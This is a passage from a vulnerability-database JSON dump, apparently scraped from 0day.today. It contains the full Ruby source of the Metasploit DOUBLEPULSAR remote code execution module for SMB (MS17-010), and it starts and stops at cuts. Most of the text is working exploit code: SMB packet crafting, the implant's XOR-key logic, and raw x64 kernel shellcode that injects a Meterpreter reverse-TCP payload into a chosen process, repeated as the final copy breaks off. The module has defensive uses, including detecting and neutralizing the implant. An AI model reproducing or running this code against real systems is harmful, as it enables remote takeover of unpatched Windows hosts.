\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-17] #"}, "lastseen": "2021-10-16T22:15:48", "differentElements": ["sourceData"], "edition": 46}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "f8fb2b6e2ee8509bc76f47648a25e4a4", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-10-18T18:16:51", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-33313"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96707", "SMNTC-96709", "SMNTC-96706", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-18T18:16:51", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-18T18:16:51", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n 